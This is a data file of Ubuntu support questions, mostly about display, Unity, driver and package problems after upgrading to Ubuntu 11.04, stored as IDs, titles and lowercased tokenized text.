39707	my mouse has gone completely crazy	i recently upgraded my laptop to natty , everything went fine and i have been using it for a few days now . however today the pointer seems to have developed a mind of its own . when i try to move it it jumps about the screen and selects things , and even when i 'm not touching it it moves slowly to the left sometimes . but the weird thing is it does not do this all the time , it seems to be doing it on and off , i just managed to use it for half an hour there before it started misbehaving again . i 've re-started the machine , does n't fix it . also the problem is not with the mouse and/or track pad because i 've plugged in various devices to test it and it does the same thing with a mouse , trackball and the fingerpad on the laptop . also if there is a thread somewhere out there that deals with this problem , just post me the link and a summary of the steps to follow . i looked and could n't find anything on this specific problem but there must be something out there somewhere .
39709	firefox video flashing white boxes	i moved to ubuntu 11 x64 abt 2 weeks ago from windows 7 x64 . i noticed that some videos on firefox flashes white/black boxes here & there boxes appear flashing about even before the video started above , even the scrollbar/time indicator is affected , the right side is also flashing black boxes ... in chrome , i have yet to experience this . isit a firefox problem ? or perhaps flash x64 beta on linux ( adobe didnt have a stable flash for linux x64 ) ?
39710	just updated ubuntu to 11.04 and my wired internet is down ! help ?	okay , i just updated ubuntu to 11.04 and my wired internet connection is down . the old setup used a static ip , but i 'm not even interested in maintaining that . i just want wired internet access . here 's the extent of my troubles as cataloged thus far : no wired internet ( wireless works fine ) no networking icon w/out running nm-applet from terminal ( it goes away again when i close the terminal when i do run nm-applet and click on the networking icon at the top of the screen `` wired network '' is greyed out , and right below that it says `` device not managed '' .
39714	how can i install youtube 's lens for unity ?	the question says it all . i would love to install the youtube lens but i see no trace of it online . the only clue i had was that it was a contributor of omg ubuntu in an article from omg ubuntu . it had no link .
39723	external display flickers after upgrade on a lenovo thinkvision l2440p	i used ubuntu 10.10 so far and i connected my lenovo thinkpad 420 via vga with my display lenovo thinkvision l2440p without any problems . since i upgraded ( it was not a fresh install ) to ubuntu 11.04 , my external display is flickering . any idea how i could solve the problem ? thanks in adavance !
39724	windows partition not shown in nautilus	i have a dual boot system with xp and natty ( just upgraded from 10.10 ) . in 10.10 and previous versions of ubuntu , i could see my xp partion and read/write files . when i upgrade to natty , no xp partion is shown . i downloaded mountmanager in software center and it could detect my xp partition with other usb/external hd devices but when i click mount nothing happens no matter how i refresh my nautilus . could this problem be related to my previous questions below ? : external hard disk and usb not detected after upgrade bug reporting tool pops up everytime i login
39727	how i can create a icon pack for ubuntu 10.04 lts or gnome ?	i try to create a icon set to ubuntu 10.04 and the only way i found to show my icons in the system are change the icons from other icon set and this is not what i want , i need to know all the process for create , install and share the icon pack thank you !
39731	terminal colors not working	i am accessing an ubuntu 10.04.2 lts server via ssh from osx . recently the colors stopped working . i think it happened while i was installing/troubleshooting rvm , but i am not positive . in .bashrc i uncommeneted force_color_prompt=yes , and when i run env | grep term i get term=xterm-color . but still no colors . any ideas ? thanks ! here is the output of cat .bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' alias dir='dir -- color=auto' alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi [ [ -s `` /usr/local/rvm/scripts/rvm '' ] ] & & . `` /usr/local/rvm/scripts/rvm ''
39734	is there a timer indicator ?	on 10.10 i 've used timer-applet and was pretty happy with it . after upgrading to 11.04 i ca n't find any way of using this timer . what countdown timer program do you recommend to use with ubuntu 11.04 ?
39735	how do i use `` initiate window picker for window group '' in compiz ?	i use unity and compiz on natty . i have scale and scale addons enabled . i set compizconfig settings manager > scale > bindings > initiate window picker for window group to set my keyboard shortcut for `` initiate window picker for window group '' to super+grave ( using grab key combo ) . if i open several gnome-terminal windows and hit super+grave , nothing happens . same for empathy , nautilus , gimp , and chromium . i 've also tried binding to super+a . how does this feature work ? what am i doing wrong ? i expect it to work like application level expose on a mac where it lets you switch through all windows from a specific program ( all finder windows or all chromium windows ) . static application switcher 's `` next window ( group ) '' feature works as expected .
39738	what does it mean when the system monitor reports a program as using over 100 percent cpu ?	i 've seen this behavior in macos 's activity monitor as well . here 's a picture of an example : playing minecraft with openjdk . i frequently see over 100 cpu when the game 's abusing the system . my girlfriend 's macos has reported over 100 percent as well on her own programs ( not just minecraft ) .
39740	is there a unity / compiz shortcut key to move a window to your other monitor ( not workspace ) ?	sort of like ctrl+alt+shift+arrow but only to my other monitor , not to a completely separate workspace .
39743	scrollbars missing in eclipse	in their frantic quest for pixel real estate , unity designers have set their greedy eyes on scrollbars and replaced the 30 years old standard vertical scrollbar with an evanescent slider ( see for instance how nautilus is behaving now ! ! ! ) . in addition , steve northover and the standard widget toolkit folks where probably cooking there own scrollbar version on top of the gtk ones . the end result of all this is that since my upgrading to 11.04 , although i immediately switched back to 'ubuntu classic ' , my eclipse ide becomes virtually useless as scrolling through large files becomes a lengthy mouse-wheel odyssey . did anybody notice ? is there a known fix to this situation ?
39753	recovering from a move of /home when it 's encrypted ( ecryptfs )	i had a 20gb / partition at work that dual-booted with windows and it quickly ran out of space . i usually do 20gb / and 160gb ( or whatever the rest of the hard drive is ) as /home , so i intended on recovering the space windows was taking up and turning that into /home . that went fine and i was able to mount the partition and rsync all my files over . however , i forgot that the partition was encrypted , so now all my files are sitting in /home/.ecrypt and /home/ $ user is empty . how can i recover my files from /home/.ecrypt and move them to /home/ $ user ? i followed this tutorial : https : //help.ubuntu.com/community/partitioning/home/moving
39754	trouble with 64 bit catalyst 11.4 x86_64 driver	i have a radeon hd 4670 . it used to work really well with the 11.3 after tweaking with vsync to remove tearing . after updating to natty , i tried to install the new 11.4 driver , but it always seems like only the ati control center front end is working . so i tried to build a deb package from the script , and ends up with this error message and no deb file . installation complete . *** glibc detected *** ./setup.data/bin/x86_64/setup : double free or corruption ( fasttop ) : 0x00000000023c7690 *** ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( +0x78a8f ) [ 0x7f1fc8785a8f ] /lib/x86_64-linux-gnu/libc.so.6 ( cfree+0x73 ) [ 0x7f1fc87898e3 ] ./setup.data/bin/x86_64/setup [ 0x40a6b5 ] ./setup.data/bin/x86_64/setup [ 0x4128fb ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xff ) [ 0x7f1fc872beff ] ./setup.data/bin/x86_64/setup [ 0x40382a ] ======= memory map : ======== ... what can i do to fix this ? thanks for your help
39757	how do i add the default radio stations from rhythmbox into banshee ?	with the change from rhythymbox to banshee there are no default radio stations in 11.04 . what are the default stations from 10.10 and how do i add them ?
39760	how can i control hdd spin down time ?	i have 2 hdds in my pc . ubuntu is turning off the secondary hdd very quickly after about 15 minutes , which is short for me . i need to control this time . how can i do it ? i tried gnome power management but did not find it useful .
39763	opening files through the unity shortcuts page tries to open with vinagre instead of nautilus	i click on the upper left corner icon , select `` find files '' , choose any folder and it attempts to open the folder with vinagre instead of nautilus . i have asked this question on other forums , with no responses .
39765	upgrade to 11.04 broke gui entirely	yesterday i ran the upgrade to 11.04 from 10.10 . while it was configuring the packages , the display froze ( as it was configuring libatm1 , not that that necessarily matters ) . apache and ssl were n't responding either , so i assumed it was a panic or something . i restarted the machine and got this error . followed the advice there , and now the machine boots and all , but at first after displaying plymouth it would show all the startup statuses and hang after `` starting apparmor [ ok ] '' or `` setting sensor limits [ ok ] '' or `` checking battery status [ ok ] '' ( all approximate quotes ) . after some looking around , xorg logs mentioned a segfault , so i removed and re-installed the windows server . now it boots into a blank screen : no plymouth , no nothing . but apache , ssh , and afp via netatalk work just fine . unfortunately i do n't have access to the specs of this machine for now , but i do know it uses an ati radeon # # # # . i do n't think i have sufficient education to ask a better question than : is there a way to completely reload the gui portion of 11.04 ?
39769	chromium `` show in folder '' opens in text editor	when i try and open a file i downloaded in chromium , it opens in a text editor . ( geany ) i click on the arrow in the download bar and select `` show in folder '' . i 'm using chromium daily stable and ubuntu 11.04 ( although this was a problem previously under ubuntu 10.10 ) with gnome . i 'm not sure where the breakdown is happening . in chromium , ubuntu or maybe geany has taken something hostage . anyone having a similar problem ? thanks ,
39770	how can i invoke scale as a unity launcher item ?	the unity launcher has an item to invoke compiz 's expo ( workspace switcher ) . how can i do the same with compiz 's scale ?
39771	custom emoticons not showing in pidgin	when i receive custom emoticons from my msn contacts in pidgin , they just show up as a red placeholder ( like the image can not be shown ) . this does n't happen when i use it on windows at work . i 'm using pidgin 2.7.11 .
39774	how to run vmware player on kernel 2.6.38-8 ? [ failed to compile module vmmon ]	i upgraded my 10.04 system to 10.10 on my way to 11.04 . i did n't try vmplayer on 10.10 , but it worked on 10.04 . i tried to start a vm in 11.04 , and it prompted me to install the vmware bits into the kernel . it would fail , and provide a log file . the log file looked normal until the end , at which point it said : '' failed to compile module vmmon '' i found a number of references on the web for that , but all related to older versions of the kernel . the one i found for 2.6.38-8 was this patch : vmware-player on ubuntu 11.04 kernel 2.6.38-8 but that is for 64 bit . i assume those header patches wo n't work on 32 bit ( yes ? )
39780	is it a good idea to selectively upgrade software from newer releases ?	i 'm a ubuntu 10.10 users , and would like to keep my os up-to-date . however , for various reasons i do n't want to upgrade to the newest ubuntu release . i 'm thinking of manually upgrading select system components like the kernel , upstart , dpkg , gcc etc from 11.04 , because i want their enhanced features . will this break anything with my existing install ? can you guys share your thoughts ?
39781	unable to locate /usr/lib/jvm/java-6-sun/jre/lib/javaws.jar in /usr/share/java	looks like 11.04 missing javaws.jar . not sure if it is intentional . /usr/share/java $ java -version java version `` 1.6.0_22 '' openjdk runtime environment ( icedtea6 1.10.1 ) ( 6b22-1.10.1-0ubuntu1 ) openjdk server vm ( build 20.0-b11 , mixed mode )
39782	appindicator in root	i am coding an gui to create a vpn . i am using now `` appindicator '' after using `` gtkstatusicon '' but the icon works with the normal user but it 's not displayed with sudo or gksudo . how to fix it ?
39785	could not update iceauthority file /home/me/.iceauthority	so i am getting a message could not update iceauthority file /home/me/.iceauthority when trying to log into ubuntu graphical . terminal works ( ctrl alt f1 ) not a duplicate of : what does this startup dialog message mean `` could not update iceauthority file '' in my case my .iceauthority is -rw -- -- -- - 1 me me ... things i tried to do to fix this : reset the ice file 's permissions in case something was messed up that i did not notice . delete the file ( no new one was created ) touch a new file after the orig was deleted looks like my home directory was owned by root . fixing did not help . .ecryptfs has correct permissions on my home directory autologin is off , never was turned on fresh install so no password changes ( i 'd prefer not to re-install my os because i did spend a day setting it up ) only weirdness found was : /home/.ecryptfs/me/.ecryptfs/wrapped-passphrase is -rw -- -- -- - 1 me root 48 ... .. however that should not be an issue or so it would seem due to permissions i installed gnome after installing the system sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell never booted into it ( or anything else rather except for tty ) successfully looks like so far nothing good coming out of this . unfortunately if i ca n't solve this i will just reinstall the distro : (
39788	configure tor to use only us proxies	can anybody tell how i can configure my tor to use only us proxies ?
39790	how do i use compiz 's `` scale window title filter '' ?	i saw an answer that described filtering the windows in compiz scale . the feature seems to be scale window title filter . i have scale , scale addons , and text turned on in compizconfig . when i invoke scale , typing does nothing . only the arrow keys , enter , and esc do anything .
39795	unity crashes without any feedback	unity crashes every now and then ( but daily ) . i can not recognize any pattern of what caused it to crash . after the crash it restarts automatically the desktop . i have a nvidia geforce go 7600 . is there any log file that could be inspected or reported ?
39798	how to force active launcher webpages to be from the chromium icon ?	so , i 'm not quite sure how to word this , but i created some custom launchers for chromium browser 's application shortcuts : as you can see in the image , the social website one is active because i opened facebook in a quicklist . however , if i were to now open up a chromium tab or use a google service , it would only add a triangle indicator to the social websites icon instead of the respective launchers it was initiated from . is there a way to force the application shortcut windows to be indicated by their respective icons , or if not , a way to force chromium to be the icon with all of the triangles ?
39802	nothing happens when clicking update to 11.04	i am on ubuntu 10.10 and each time i boot my os it asks me to if i want to update to 11.04 . i click `` yeah , why not '' . it downloads 2 files , asks my password and that 's all . nothing happens . edit ok , i 've ran sudo apt-get update & & sudo apt-get dist-upgrade and get downloadings and settings and after few seconds it stops after ldconfig deferred processing now taking place upd 2 /etc/apt/sources.list # deb cdrom : [ ubuntu 10.10 _maverick meerkat_ - release i386 ( 20101007 ) ] / maverick main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ru.archive.ubuntu.com/ubuntu/ maverick main restricted deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //ru.archive.ubuntu.com/ubuntu/ maverick-updates main restricted deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ru.archive.ubuntu.com/ubuntu/ maverick universe deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick universe deb http : //ru.archive.ubuntu.com/ubuntu/ maverick-updates universe deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ru.archive.ubuntu.com/ubuntu/ maverick multiverse deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick multiverse deb http : //ru.archive.ubuntu.com/ubuntu/ maverick-updates multiverse deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //ru.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu maverick partner # deb-src http : //archive.canonical.com/ubuntu maverick partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //security.ubuntu.com/ubuntu maverick-security main restricted deb-src http : //security.ubuntu.com/ubuntu maverick-security main restricted deb http : //security.ubuntu.com/ubuntu maverick-security universe deb-src http : //security.ubuntu.com/ubuntu maverick-security universe deb http : //security.ubuntu.com/ubuntu maverick-security multiverse deb-src http : //security.ubuntu.com/ubuntu maverick-security multiverse deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen
39805	is there an easy way to rearrange or move the icons in the unity launcher ?	it looks like the only time that you can choose where an icon goes on the unity launcher , is when you add it . is there a way to rearrange the order of an icon after it has been added ?
39809	nvidia driver activated but not currently in use on ubuntu 11.04	i have installed nvidia drivers separately through sudo apt-get and additional drivers but same error occurs every time . tried to uninstall and reinstall nothing changed . is there any other way to remove completely nvidia driver files and settings and make a clean setup ? my visual effects is not working either because of video card problem . i have installed ubuntu via wubi . please help
39812	flags in unity keyboard indicator	i would like to apply language flags for faenza and elementary to unity keyboard indicator . but old `` hack '' does n't seem to work on it . is it somehow possible ?
39814	why is my sandy bridge i915 video adapter periodically freezing under load ?	when i use opengl at anything close to full-screen resolution , rendering , audio , and processing begin to stutter -- freezing for about a second at a time . kern.log reports : [ drm : i915_hangcheck_ring_idle ] *error* hangcheck timer elapsed ... blt ring idle [ waiting on 247635 , at 247635 ] , missed irq ? ... once for each `` stutter '' event .
39816	how do i throttle ubuntu one ?	ubuntu one sync is using almost all of my cpu resources . how do i control that ?
39821	compiz huge memory leak- ubuntu 11.04-unity	memory used by the compiz app ( id 1527 ) when session is started- 45-55 mb , memory used after 2 hours , 500 mb . i found the following bug report https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/720446 has it been solved ? is there a work around ? is it related to the nvidia drivers ?
39826	what does `` whiteout '' mean in a copy-on-write filesystem ?	the manual for aufs makes several references to something called a `` whiteout '' , but it 's not clear to me what this is . what is a whiteout and why would one exist ?
39828	how do i only use the icons for applications in the faenza icon set ?	i downloaded the faenza icon set and installed the `` dark '' variant on my desktop . however i only want the icons for applications ( the ones that go in the unity launcher ) , i want all the other icons to remain stock . here 's a screenshot to illustrate :
39830	keyboard bindings broken	i 've managed to get the keyboard bindings super-a and super-f broken ... they now respond as if i long-press super without a or f ( open the launcher ) . i do n't know how to restore the default working where it opens the applications dash or files/folders dash . i 've tried to run `` unity -- reset '' but that did n't make any difference accept that also ctrl-alt-t ( terminal ) also does n't work anymore .
39831	how do i change the color of the indicator applet to green ?	i want to change the indicator app 's color from `` blue '' to `` green '' again . in 10.04 all notifications were in green , 11.04 now has blue color notification . how can i change it back to green ? from this : to this :
39832	how do i get unity working on an asus ul50v ?	after i first upgraded to natty from 10.10 i went to fix my compiz settings . first , the rotating cube would n't work . that was disappointing but not a huge deal . later , every time i changed a setting in compiz , my whole top toolbar with my clock , keyboard settings , calendar , etc . disappeared . i brought it back with a reboot , but that was only temporary . then i tried to install my nvidia drivers ( i 'm using an asus ul50v ) and after they were installed , i rebooted . upon going back into natty i was informed that unity had crashed and was not compatible with my machine ( i had already been using unity for about a day at that point ) . now i 'm just running in classic mode . how can i get unity back up and running ? and once i do , what is there to do about my problems in the first paragraph ? thanks !
39834	do n't see unity anywhere after upgrading from kubuntu 10.10 -- what am i missing ?	i had kubuntu 10.10 and had all the updates done there before allowing the upgrade to 11.04 . everything went well insofar as the upgrade . final reboot and voila ! ummmmm ... .wait a minute ... .it looks virtually identical to the kubuntu screen prior to the upgrade . no `` dock '' to the left , etc . outside of some new default applications , does n't look like i 've done anything . and i do n't see anything on startup asking for default desktop . ok , and i do n't know if this has any bearing -- i 'm running this under windows vista using vmware player ( most recent version ) . i 've allocated 1 gig for the virtual os . and it seems `` snappy '' enough , all things considered . is this just considered too underpowered and that 's why unity is n't visible to me . is there someplace that i have to make a setting to make it happen . is there some double secret handshake i need ? what ? ? ?
39837	how do i make cedilla ( รง ) character available in english usa ?	i need the character cedilla working my english usa ubuntu natty but when use the normal combination ' then c i get this ฤ . in the previous versions i used this solution : [ solved ] getting รง cedilla instead of c acute with american keyboards but it is n't working on natty . any help will be very appreciatted ! best regards .
39842	simultaneous downloading from ubuntu one	are people able to download the same file simultaneously from ubuntu one ? if so , how many simultaneous downloads ? thanks .
39843	application indicator for shutter	looking through the list of application indicators , i see screenshots that appear to have a shutter indicator . where can i find & install this ?
39844	intel dh57jg vs. ubuntu 11.04	i 've installed 11.04 on my pc ( processor i5 660 ) and what i get on start-up is in sequence a violet screen a black one and after system crash . the unique way to log in ubuntu is in recovery mode . i made test for unity 3d , it failed so i installed unity-2d but nothing changed . launching less /var/log/xorg.0.log i noted this two warnings : ( ww ) falling back to old probe method for vesa ( ww ) falling back to old probe method for fbdev can please someone help me to resolve this problem and win fighting against ubuntu ? i 've read on a forum that a solution is to downgrade kernel to a previous working version but it was not explained and i do not know how to do it : - ( my ubuntu version is i386 ; can resolve my problem amd64 version ? thanks in advance ciao h .
39846	apt-get : how to overwrite existing files from another package ?	i 'm trying to install gnome3 for natty , using the source deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu natty main , however the following error : $ sudo apt-get install -f ... unpacking replacement gnome-games-common ... dpkg : error processing /var/cache/apt/archives/gnome-games-common_1 % 3a3.0.0- 0ubuntu1~build1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/gnome-games-common/cards/bonded.svg ' , which is also in package gnome-games-extra-data 2.30.0-1ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gnome-games-common_1 % 3a3.0.0-0ubuntu1~build1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i ca n't sudo apt-get remove gnome-games-common , neither gnome-games-extra-data , before fixed the above problem : $ sudo apt-get remove gnome-games-common reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : aisleriot : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed glchess : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed glines : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnect : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnibbles : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnobots2 : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnome-mahjongg : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnome-sudoku : depends : gnome-games-common ( > = 1:2.32.1-0ubuntu5 ) but it is not going to be installed gnomine : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnotravex : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gnotski : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed gtali : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed iagno : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed lightsoff : depends : gnome-games-common ( > = 1:2.32.1-0ubuntu5 ) but it is not going to be installed quadrapassel : depends : gnome-games-common ( > = 1:3.0.0-0ubuntu1~build1 ) but it is not going to be installed swell-foop : depends : gnome-games-common ( > = 1:2.32.1-0ubuntu5 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i 'd like to just overwrite the existing file /usr/share/gnome-games-common/cards/bonded.svg , can i ?
39848	how can i reduce the delay and increase the scroll speed of the unity launcher ?	i find the default launcher display delay to be extremely long and the scroll speed to be extremely slow . i understand why these are the defaults , but it makes me feel like i 'm constantly waiting for it to do its thing . i feel like i 'm wasting many minutes each day because of it . i have done everything i can come up with on my own to try to configure them , but it does n't seem possible . i have made sure my `` edge trigger delay '' is set to 0 , but the delay in making the launcher appear is still way too long . is there any way to modify it ? i 've played with all the different animations , but the delay seems to happen before any of the animations even start . is there no way to adjust the delay of the appearance of the launcher ? i know i can move my mouse all the way up to the top-left corner to make it appear instantly , but i ca n't believe there is n't a way to configure the delay when using the left method . second , the ( lack of ) speed at which the launcher scrolls through options is just painful . i have n't found any way to configure that either . i 've already shrunk the icon size to 32 , but i still have more icons than fit and am forced to wait for unity to scroll . these icons all fit nicely , with much room to spare , across the top . forcing the launcher to the left , means there is much less space for launcher items . is there a way to move it to the top or bottom ? that would at least help me avoid having to wait and wait for it to scroll . thanks
39849	can i drag a window onto another workspace ?	i just updated to 11.04 , now if i drag a window to the side of the workspace , the window is maximized to half of the screen . is there a way to move it to another workspace with the mouse ? i know you can right-click on the title and choose `` move to another workspace '' , but i would like something quicker .
39850	which union filesystem is best supported ?	i 'm interested in knowing the answer to this unanswered question from the ubuntu forums : i am trying to get one folder to display the content of two other folders . ... i am a bit troubled by the different options . there is unionfs , which seems to be available only via fuse in ubuntu server , and not recommended as it 's said to be buggy . there is aufs , which people are campaigning hard to get out of the kernel . there are talks about a vfs solution being developed but i ca n't find anything about it . what is the best solution to use ? which union filesystem should i choose in order to have the best support in current and future releases of ubuntu ?
39852	how to remove warnings like `unknown media type ... `	each time apt-get tries to process triggers for shared-mime-info , it reports warnings like : ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' unknown media type in type 'interface/x-winamp-skin' i 've checked /usr/share/mime-info but does n't see any of them : /usr/share/mime-info $ grep 'url/rtspu ' * ( got nothing ) so , how to clean up my system so it wo n't report these unknown media types ?
39857	is my graphics card supported by gnome 3 ?	i was running maverick very fluently , before i upgraded to natty . however , the display performance seems fall down . for example , zoom desktop is very well in maverick , but very slow in natty . i think it 's caused by unity . so i installed gnome 3 , using the source deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu natty main . after installed gnome 3 , unfortunately it runs in fallback mode , and said maybe my graphics hardware is not supported . $ lspci |grep -i vga 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) should i have to upgrade my graphics card ? the card is bought 2 years ago , though .
39860	how to switch back to classic mode ?	i do n't like both of unity and gnome 3 , but i ca n't find the classic one either , after installed gnome 3 . the only choices are : fluxbox gnome shell recovery mode user defined session so how to get back the classic session ?
39871	how can i hide the decoration of maximized windows ?	i just added the window buttons applet to my panel , but it seems that the hide compiz decorations for maximized windows feature no longer works after my upgrade to natty . is there another way to achieve the same effect in compiz ?
39873	where can i find dell 1510 wireless-n drivers ?	where can i find dell 1510 wireless-n drivers for ubuntu 11.04 ?
39874	transmission torrent client hangs up after upgrade	i had a 10.10 ubuntu installation and upgraded to most recent 11.04 . after the upgrade when i start the transmission the window appears but no components inside and after a while it becomes grey and the option to force quite appears .
39877	natty broke my system ! i think i know how to fix it but	i 've just upgraded to natty , having patiently waited for the final release date and for ubuntu to nag me about it every minute . now , whenever i log into anything other than ubuntu safe mode , the system hangs . the mouse does n't work , the clock freezes , the ssh connexion is broken . this happens after the login , on all desktops , except for safe mode , including unity , classic and , my standard desktop , kde . i ca n't find any error in any log . all seems to work fine . sometimes the system starts for a couple of seconds and then freezes , sometimes it freezes while the desktop is still loading . but the computer is completely unusable outside of the safe mode . i 'm thinking , if there is a list somewhere of what safe mode does not start , i could start all of these things one by one and see what makes my system freeze that way . is there such a list somewhere ? or even better : does anyone have an idea of what it might be ? the problem does not come from the 3d or compiz or anything of the kind . that works . i 've tried it and disabled it from kde . plus , `` classic no effects '' has the same problem as the rest . what could it be ? and what does classic safe mode not do ? thanks .
